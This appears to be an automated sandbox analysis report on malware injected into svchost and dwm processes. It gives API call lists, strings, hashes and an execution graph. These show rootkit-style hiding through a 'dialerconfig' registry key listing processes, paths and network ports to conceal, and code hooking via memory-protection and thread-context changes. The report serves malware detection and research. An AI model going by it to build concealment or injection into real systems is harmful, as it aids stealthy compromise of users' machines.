                                                                                                      control_flow_graph 354 1f027619804-1f027619842 355 1f027619933 354->355 356 1f027619848-1f02761984b 354->356 358 1f027619935-1f027619951 355->358 357 1f027619851 356->357 356->358 359 1f027619854 357->359 360 1f02761992b 359->360 361 1f02761985a-1f027619869 359->361 360->355 362 1f027619876-1f027619895 LoadLibraryExW 361->362 363 1f02761986b-1f02761986e 361->363 366 1f027619897-1f0276198a0 GetLastError 362->366 367 1f0276198ed-1f027619902 362->367 364 1f027619874 363->364 365 1f02761990d-1f02761991c GetProcAddress 363->365 370 1f0276198e1-1f0276198e8 364->370 365->360 369 1f02761991e-1f027619929 365->369 371 1f0276198a2-1f0276198b7 call 1f02761ad28 366->371 372 1f0276198cf-1f0276198d9 366->372 367->365 368 1f027619904-1f027619907 FreeLibrary 367->368 368->365 369->358 370->359 371->372 375 1f0276198b9-1f0276198cd LoadLibraryExW 371->375 372->370 375->367 375->372
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                      • String ID: api-ms-
                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                      • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                                      • Instruction ID: 412014ecd3daabd3475624c40ff682eaafffb02cece36363ccd594d64553e659
                                                                                                      • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                                      • Instruction Fuzzy Hash: B1319E31312B9291EF53DB16A80C7F96398BB0CBA0F994935AD2D4A786DF38C4458320

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                      • String ID: CONOUT$
                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                      • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                                      • Instruction ID: 05eb99dbe028fa855020d5fb138734ec245ccd26a538efccdc413b4789f7cb83
                                                                                                      • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                                      • Instruction Fuzzy Hash: A2119D31714B4186EB928B03E84C3A972A0F38CFE4F140235EE5D877A6CF38C9048750
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Thread$Current$Context
                                                                                                      • String ID:
                                                                                                      • API String ID: 1666949209-0
                                                                                                      • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                                      • Instruction ID: ed55551250f9abba239af1599b1bb7fe933e74c4abe4918d54a7f72f31bead7b
                                                                                                      • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                                      • Instruction Fuzzy Hash: 16D17F76204B9985DF719B1AE49C3AAB7A0F3CCB84F544126EE8D47BA6DF38C541CB10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocFree
                                                                                                      • String ID: dialer
                                                                                                      • API String ID: 756756679-3528709123
                                                                                                      • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                                      • Instruction ID: 715419c192bb809a15ea80e0bc9697393aa3ce975b4fd6a13ad6700885e86c36
                                                                                                      • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                                      • Instruction Fuzzy Hash: F831AD32701B5282EF57CF57A80D2B973A0FB48B84F4D80309E8E07B56EB38C4A18710
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 517849248-0
                                                                                                      • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                                      • Instruction ID: 051f7deb2553346fd71f3f66225ea82d6d0eb3540e6d6572cd6929e21988e1b3
                                                                                                      • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                                      • Instruction Fuzzy Hash: CB015731300A8696EB55DB13A86C3A963A1F78CFC0F888035CE8D43B56DF39C9898320
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 449555515-0
                                                                                                      • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                                      • Instruction ID: 614a8cc3a4d8035bdb76e7554972262afda3ae373ee47a123f2fa1de5b99c486
                                                                                                      • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                                      • Instruction Fuzzy Hash: FC111B7571174286EFA69B62E40D7A667A0BB5CB85F080435CE5D47767EF3CC4088B24
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                                                      • String ID: \\?\
                                                                                                      • API String ID: 2719912262-4282027825
                                                                                                      • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                                      • Instruction ID: 896fa5cdf56122005822c849ae728db11d48aca383cceedc3fdadeebfaea80ea
                                                                                                      • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                                      • Instruction Fuzzy Hash: 72F0443230464292EF618B21F49C3A96760F748B88F888030CE4D46656DF6CC648C710
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CombinePath
                                                                                                      • String ID: \\.\pipe\
                                                                                                      • API String ID: 3422762182-91387939
                                                                                                      • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                                      • Instruction ID: 12d817fb98ab98530911da1243089bdd5e2b1874c2d9932a63a6d1c8d66121ee
                                                                                                      • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                                      • Instruction Fuzzy Hash: FFF05830304B8292EF819B13B90D1A9A220BB8CFD0F4C8131AE9A07B2BCF28C5818310
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                                      • Instruction ID: 4bfbf02fe615d12f47e754b17dbedda9d2ff865e4dd73407dcf8c6b3b2b9590c
                                                                                                      • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                                      • Instruction Fuzzy Hash: 27F0FE7131164691EF964B61E88D3B52760BB4CB90F8820399D4B45667DF28C58CC734
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 1092925422-0
                                                                                                      • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                                      • Instruction ID: 3f388ef9d7ca36bcf002eebfb7e1dee43f0d2356baf41d1914770b685fe09b0b
                                                                                                      • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                                      • Instruction Fuzzy Hash: 8D113C3A704B4282EF569B22F40C6A976A1F74CB84F484439DE8E07B96EF3DC904C724
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual
                                                                                                      • String ID: NtQuerySystemInformation
                                                                                                      • API String ID: 2154932578-2549949336
                                                                                                      • Opcode ID: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
                                                                                                      • Instruction ID: e698f140a5967568df19400b1fea0ea1b076e74ff741fdf004768ec056d3a9a1
                                                                                                      • Opcode Fuzzy Hash: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
                                                                                                      • Instruction Fuzzy Hash: 43F0AF7721878182EB518B16F8483BA6361F78DBA0F480134EE8E86B49DF38C589CB10
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$Free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3168794593-0
                                                                                                      • Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                                      • Instruction ID: e0e9ba7901fbb51452903b6ab99e7061dc1d8ea017eb5fa8dd1a86ca643d3006
                                                                                                      • Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                                      • Instruction Fuzzy Hash: E3112E31614B8992EB569F67A84C26A7360F78DF84F084139DF9A03716DF38C051CB50
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 953036326-0
                                                                                                      • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                                      • Instruction ID: 5ea84992f39011e9a5c8d2da058ca6cf7e4212114c2842ab8d75388b89b0e291
                                                                                                      • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                                      • Instruction Fuzzy Hash: C681AD32A1065689FFD29B65984C3FD36A1F74CB88F944136DE0A53B9BDB388842C330
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2933794660-0
                                                                                                      • Opcode ID: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
                                                                                                      • Instruction ID: ca216e2e7cf83f0c76c13a56a3a4701868f077c4ef54d1e64fdb160b8613109e
                                                                                                      • Opcode Fuzzy Hash: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
                                                                                                      • Instruction Fuzzy Hash: FE112A32300F428AEF518F61E85D3A833A4F71D75CF441A31EEAD467A6DB38C1A58390
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileType
                                                                                                      • String ID: \\.\pipe\
                                                                                                      • API String ID: 3081899298-91387939
                                                                                                      • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                                      • Instruction ID: 06db4fdc41d634498f54957276acab47bc43d9accb9158981a9122bdfacfc34b
                                                                                                      • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                                      • Instruction Fuzzy Hash: ED719F323047864AEF669A2A995C3FB6691F74CB84F844436DE4E43B9ADF35C9048B50
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileType
                                                                                                      • String ID: \\.\pipe\
                                                                                                      • API String ID: 3081899298-91387939
                                                                                                      • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                                      • Instruction ID: f2d1f905dbd20a665483f8a3ba5d59f19f14e1e658e4e196279b6d51a5342bfe
                                                                                                      • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                                      • Instruction Fuzzy Hash: 8751A33230878246EF669B2A955C3FB6651F389B80F844035CD8E13B9BDB39C4118FA0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unwind
                                                                                                      • String ID: csm$f
                                                                                                      • API String ID: 3419175465-629598281
                                                                                                      • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                                      • Instruction ID: 8508c58bd7788d07c1145e59ca5bbf8e24b4e3fe7d4f74a0b167d1faecced3da
                                                                                                      • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                                      • Instruction Fuzzy Hash: 2451B0327217828AEF56CF15E44CBA93795F348B88F928130DE0E5778ADB75D881C720
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID: U
                                                                                                      • API String ID: 442123175-4171548499
                                                                                                      • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                                      • Instruction ID: 13f8b7aac6d598e6da12296cb5b7832669a4a4df737ddc7cca1fd6f324f3f973
                                                                                                      • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                                      • Instruction Fuzzy Hash: 9F419F72314A8185EB619F25E44C3EAB7A1F39C784F444135EE8D87B9ADB38C541CB60
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unwind
                                                                                                      • String ID: csm$f
                                                                                                      • API String ID: 3419175465-629598281
                                                                                                      • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                                      • Instruction ID: 69435b4408430f2be2dddd693d9c8b1702089a255d7ec34e5b1050a474663d5d
                                                                                                      • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                                      • Instruction Fuzzy Hash: F731C4322107819AEF16DF12E84C7A937A5F748B88F568124AE4E07797DB38C984C714
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                      • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                                      • Instruction ID: 2cbc9caeb1e91552346287051453d8a8b1c787514decf881763449a2d89ba5b6
                                                                                                      • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                                      • Instruction Fuzzy Hash: DA111C32219B8182EF628F15E4483A977A5F788B98F5C4221DF8D07B6ADF3CC555CB00
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001C.00000002.12794671083.000001F027610000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F027610000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_28_2_1f027610000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocFree
                                                                                                      • String ID:
                                                                                                      • API String ID: 756756679-0
                                                                                                      • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                      • Instruction ID: d56f050d774505197d4e7eb20a5d5a691077f7021d0a3129742ab9fc6c295e5f
                                                                                                      • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                      • Instruction Fuzzy Hash: 57218332704B9182EF568F5AE40C2AAB3A0FB88B94F494124DE8C47B26EF78C5428710

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:1.2%
                                                                                                      Dynamic/Decrypted Code Coverage:95.9%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:97
                                                                                                      Total number of Limit Nodes:13
                                                                                                      execution_graph 21186 2311e401c28 21192 2311e401650 GetProcessHeap HeapAlloc 21186->21192 21188 2311e401c3e Sleep SleepEx 21190 2311e401c37 21188->21190 21190->21188 21191 2311e4015c0 StrCmpIW StrCmpW 21190->21191 21236 2311e4018dc 12 API calls 21190->21236 21191->21190 21237 2311e401274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 21192->21237 21194 2311e401678 21238 2311e401274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 21194->21238 21196 2311e401689 21239 2311e401274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 21196->21239 21198 2311e401692 21240 2311e401274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 21198->21240 21200 2311e40169b 21201 2311e4016b6 RegOpenKeyExW 21200->21201 21202 2311e4016e8 RegOpenKeyExW 21201->21202 21203 2311e4018ce 21201->21203 21204 2311e401711 21202->21204 21205 2311e401727 RegOpenKeyExW 21202->21205 21203->21190 21248 2311e4012c8 16 API calls 21204->21248 21207 2311e401762 RegOpenKeyExW 21205->21207 21208 2311e40174b 21205->21208 21209 2311e401786 21207->21209 21210 2311e40179d RegOpenKeyExW 21207->21210 21241 2311e40104c RegQueryInfoKeyW 21208->21241 21249 2311e4012c8 16 API calls 21209->21249 21214 2311e4017c1 21210->21214 21215 2311e4017d8 RegOpenKeyExW 21210->21215 21211 2311e40171d RegCloseKey 21211->21205 21250 2311e4012c8 16 API calls 21214->21250 21219 2311e401813 RegOpenKeyExW 21215->21219 21220 2311e4017fc 21215->21220 21217 2311e401793 RegCloseKey 21217->21210 21223 2311e401837 21219->21223 21224 2311e40184e RegOpenKeyExW 21219->21224 21251 2311e4012c8 16 API calls 21220->21251 21221 2311e4017ce RegCloseKey 21221->21215 21228 2311e40104c 6 API calls 21223->21228 21225 2311e401872 21224->21225 21226 2311e401889 RegOpenKeyExW 21224->21226 21229 2311e40104c 6 API calls 21225->21229 21230 2311e4018c4 RegCloseKey 21226->21230 21231 2311e4018ad 21226->21231 21227 2311e401809 RegCloseKey 21227->21219 21232 2311e401844 RegCloseKey 21228->21232 21233 2311e40187f RegCloseKey 21229->21233 21230->21203 21234 2311e40104c 6 API calls 21231->21234 21232->21224 21233->21226 21235 2311e4018ba RegCloseKey 21234->21235 21235->21230 21237->21194 21238->21196 21239->21198 21240->21200 21242 2311e4011b5 RegCloseKey 21241->21242 21243 2311e4010b9 21241->21243 21242->21207 21243->21242 21244 2311e4010c7 RegEnumValueW 21243->21244 21246 2311e40111c 21244->21246 21245 2311e401149 GetProcessHeap HeapAlloc 21245->21246 21246->21242 21246->21244 21246->21245 21247 2311e40117f GetProcessHeap HeapFree 21246->21247 21247->21246 21248->21211 21249->21217 21250->21221 21251->21227 21252 2311e403b99 21255 2311e403ae6 21252->21255 21253 2311e403b50 21254 2311e403b36 VirtualQuery 21254->21253 21254->21255 21255->21253 21255->21254 21256 2311e403b6a VirtualAlloc 21255->21256 21256->21253 21257 2311e403b9b GetLastError 21256->21257 21257->21253 21257->21255 21258 2311e3d2908 21259 2311e3d2936 21258->21259 21260 2311e3d2994 VirtualAlloc 21259->21260 21261 2311e3d29b8 21259->21261 21260->21261 21262 2311e402a7c 21264 2311e402ac1 21262->21264 21263 2311e402b20 21264->21263 21266 2311e403930 21264->21266 21267 2311e403952 21266->21267 21268 2311e40393d StrCmpNIW 21266->21268 21267->21264 21268->21267 21269 2311e40562d 21271 2311e405634 21269->21271 21270 2311e40569b 21271->21270 21272 2311e405717 VirtualProtect 21271->21272 21273 2311e405751 21272->21273 21274 2311e405743 GetLastError 21272->21274 21274->21273 21275 2311e405dd0 21276 2311e405ddd 21275->21276 21277 2311e405de9 21276->21277 21283 2311e405efa 21276->21283 21278 2311e405e1e 21277->21278 21279 2311e405e6d 21277->21279 21280 2311e405e46 SetThreadContext 21278->21280 21280->21279 21281 2311e405f21 VirtualProtect FlushInstructionCache 21281->21283 21282 2311e405fde 21284 2311e405ffe 21282->21284 21297 2311e4044c0 VirtualFree 21282->21297 21283->21281 21283->21282 21293 2311e404ed0 GetCurrentProcess 21284->21293 21286 2311e406003 21288 2311e406057 21286->21288 21289 2311e406017 ResumeThread 21286->21289 21298 2311e407a20 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 21288->21298 21290 2311e40604b 21289->21290 21290->21286 21292 2311e40609f 21294 2311e404eec 21293->21294 21295 2311e404f02 VirtualProtect FlushInstructionCache 21294->21295 21296 2311e404f33 21294->21296 21295->21294 21296->21286 21297->21284 21298->21292

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                      • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                      • API String ID: 106492572-2879589442
                                                                                                      • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                                      • Instruction ID: 1d18a3dcf9cec88600b4f2f2ab85457d101ae6e11dee5f1a4885384f7e0e1ee2
                                                                                                      • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                                      • Instruction Fuzzy Hash: 8E71F736710A5086EB10DFA5E8586D92BE4FB84F8CF011125DB8D97F29DFB8C665E310

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
